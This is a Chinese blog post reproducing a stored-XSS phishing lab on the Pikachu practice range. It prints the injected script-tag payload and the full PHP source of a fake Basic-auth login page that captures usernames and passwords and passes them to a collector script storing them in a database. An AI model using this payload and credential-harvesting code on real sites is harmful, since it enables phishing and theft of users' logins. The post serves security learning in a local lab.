1、pikachu靶场之xss钓鱼复现

于 2024-05-24 16:51:43 发布
阅读量522 收藏 3
点赞数 6
分类专栏: xss 文章标签: xss 前端 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51520483/article/details/139178361
版权

一、复现过程

1、payload

<script src="http://127.0.0.1/pkxss/xfish/fish.php"></script>

将这段代码插入到含有储存xss的网页上,如下留言板

2、此时恶意代码已经存入数据库,并存在网页中,当另一个用户打开这个网页时,就会触发xss恶意代码,被跳转的另一个页面,并弹出登入框

3、这个时候如果输入账号密码,就会被恶意构造的后台窃取储存

二、分析流程

1、fish.php:文件源码分析,这是恶意构造的页面,即恶意插入xss代码中的url:127.0.0.1/pkxss/xfish/fish.php

即复现步骤2的恶意构造登入页面的源码

这是一个basic认证,你输入账号密码时会将这些信息记录并重定向到http://127.0.0.1/pkxss/xfish/xfish.php?页面

<?php
error_reporting(0);
// var_dump($_SERVER);
if ((!isset($_SERVER['PHP_AUTH_USER'])) || (!isset($_SERVER['PHP_AUTH_PW']))) {
//发送认证框,并给出迷惑性的info
    header('Content-type:text/html;charset=utf-8');
    header("WWW-Authenticate: Basic realm='认证'");
    header('HTTP/1.0 401 Unauthorized');
    echo 'Authorization Required.';
    exit;
} else if ((isset($_SERVER['PHP_AUTH_USER'])) && (isset($_SERVER['PHP_AUTH_PW']))){
//将结果发送给搜集信息的后台,请将这里的IP地址修改为管理后台的IP
    header("Location: http://127.0.0.1/pkxss/xfish/xfish.php?username={$_SERVER[PHP_AUTH_USER]}
    &password={$_SERVER[PHP_AUTH_PW]}");
}

?>

2、xfish.php:他会获取到传入过来的账号密,并将这些存入数据库

<?php
error_reporting(0);
include_once '../inc/config.inc.php';
include_once '../inc/mysql.inc.php';
$link=connect();



if(!empty($_GET['username']) && !empty($_GET['password'])){

    $username=$_GET['username'];
    $password=$_GET['password'];
    $referer="";
    $referer.=$_SERVER['HTTP_REFERER'];
    $time=date('Y-m-d g:i:s');
    $query="insert fish(time,username,password,referer) 
    values('$time','$username','$password','$referer')";
    $result=mysqli_query($link, $query);
}

?>

总结:

1、在含有xss漏洞页面,插入一个一个恶意script代码,代码会触发跳转页到恶意页面

你挡我发光了
关注
  • 6
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
web渗透教程1:pikachu靶场搭建
11-17
带你手把手搭建pikachu靶场环境
Pikachu靶场攻略(代码分析)
红队是青春
01-31 931
Pikachu靶场攻略和代码分析
SSRF(服务器请求伪造)漏洞分析——pikachu-ssrf、vulhub-weblogic-ssrf靶场复现
qq_45612828的博客
08-06 3112
SSRF(服务器请求伪造)——pikachu-ssrf、vulhub-weblogic-ssrf靶场复现
pikachu靶场复现记录--持续更新完善优化思路
最新发布
2201_75375302的博客
12-17 1113
alert(1)、>alert(1)、>alert(1)>等多个尝试,发现被过滤掉了一类的标签;这里存在一个代码漏洞,提交alert(1),在前面多提交一个是为了将上一个收尾掉。发现url后面变成我输入的东西。老样子,先提交一遍alert(1)
Pikachu——Xss钓鱼
m0_60767986的博客
04-23 7947
前端js代码限制输入框只能提交20个字段,将它修改为100即可(当然,这是get型xss,可以直接在url传参处添加攻击语句)提交攻击语句后发现,跳转回了靶场首页,网页debug发现:第一:请求了指定的钓鱼页面的url,并在后面携带了我的cookie信息第二:跳转回靶场首页(前面“靶场cookie获取的额外操作”的结果,用来抵消受害者的怀疑)
安装pikachu复现暴力破解漏洞
2302_76965792的博客
11-20 270
下载好后,是一个zip压缩包注意!不是这个文件!确认连接数据库的账户与密码正确,启动phpstudy 2016因为某些原因,我重新在安装时,出现了没有往外蹦红色初始化,反而是出现第一行报错。
pikachu靶场全部通关.pdf
08-16
由于在有道云写的,不好发博客,只能这样子,个人结合B站视频,总结
pikachu靶场全通关教程
07-20
这个是刚开始学网络安全渗透的靶场练习心得,分享给大家
pikachu靶场环境
02-12
在"Pikachu靶场"中,用户通常会遇到各种网络安全挑战,包括但不限于Web应用漏洞挖掘(如SQL注入、XSS跨站脚本攻击、文件包含漏洞等)、网络服务漏洞利用(如FTP、SMTP、SSH等服务的漏洞)、密码学概念应用(如加密与...
pikachu靶场SQL注入.docx
09-13
"Pikachu靶场SQL注入" Pikachu靶场SQL注入是针对Web应用程序的一种攻击手段,通过对Web应用程序的输入参数进行tampering,来达到访问数据库的目的。下面是Pikachu靶场SQL注入的详细知识点: 一、数字型注入(POST...
XXE(XML外部实体注入)漏洞分析——pikachu靶场复现
qq_45612828的博客
08-02 6740
XXE(XML外部实体注入)漏洞分析——pikachu靶场复现
Pikachu靶场学习记录(6500字归纳总结)
身高两米不到的博客
03-22 7095
回归本源,之前学过很多次却没有动笔记录过,最后一次通关Pikachu靶场,把知识稍加记录,向它好好告别。 一、暴力破解 场景概述:暴力破解工具使用burpsuite,使用暴力猜解对目标网站账号密码进行撞库,如果撞库成功就可以登录后台。 基于表单的暴力破解 随便输入账号密码,aaa:aaa,显示用户名或密码不存在,抓包到repeater模块,发送几次发现没有变化,可以判断就是简单的验证机制,发送到intruder模块,进行爆破 爆破比较重要的一点就是字典,按理说只要字典强大就可以撞库成功,从而.
pikachu靶场复现暴力破解漏洞
WSGWZlz的博客
11-20 286
pikachu靶场的搭建及暴力破解通关
使用pikachu靶场复现暴力破解漏洞
2302_76966971的博客
11-20 232
使用pikachu靶场复现暴力破解漏洞
phpStudy下载(安装)-图文详解(windows)
热门推荐
wzhua的博客
09-11 3万+
phpStudy下载(安装)-图文详解 有phpStudy下载链接 包含pikachu和sqli的安装包
pikachu复现暴力破解漏洞
Retr10010的博客
11-20 526
一般只需要打开Apache和MySQL就足够我们平时搭建网站使用了。
Pikachu漏洞靶场系列之XSS
weixin_45868644的博客
09-10 4953
文章目录概述跨站脚本漏洞常见类型XSS漏洞的测试流程搭建XSS后台一、反射型XSS(Get)实验案例-获取Cookie二、反射型XSS(Post)三、存储型XSS实验案例-钓鱼攻击实验案例-键盘记录什么是跨域跨域-同源策略为什么要同源策略四、DOM型XSS五、DOM型XSS-X六、XSS之盲打七、XSS之过滤转换的思路编码的思路XSS之htmlspecialcharsXSS常见防范措施XSS之href输出XSS之js输出总结XSS常见Payload 概述 1、XSS就是攻击者在web页面插入恶意的Scri
pikachuXSS分类、场景(钓鱼、盲打、过滤)
m0_59856804的博客
12-20 1295
Xss pikachu 保存型xss 反射型、DOM型 xss钓鱼 Xss盲打 XSS过滤 XSS之htmlspecialchars Htmlspecialchars()函数 XSS之href输出 防范措施: 21
【记一次踩坑:pikachu靶场钓鱼无法获取cookie】
weixin_38541179的博客
11-26 492
标红处少了单引号,然后完美获取到了,对照下图才发现的不清楚是我下载的靶场是不是有问题,还是太菜了,一下竟然没发现。折腾了好久。
写一个python脚本检测pikachu靶场xss过滤
06-03
对于这个问题,需要先了解Pikachu靶场XSS过滤机制。Pikachu靶场使用了一种基于DOM的XSS防御机制,将用户输入的内容解析为DOM节点,然后对节点的属性进行过滤和转义,最终输出到页面上。 为了检测Pikachu靶场XSS...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值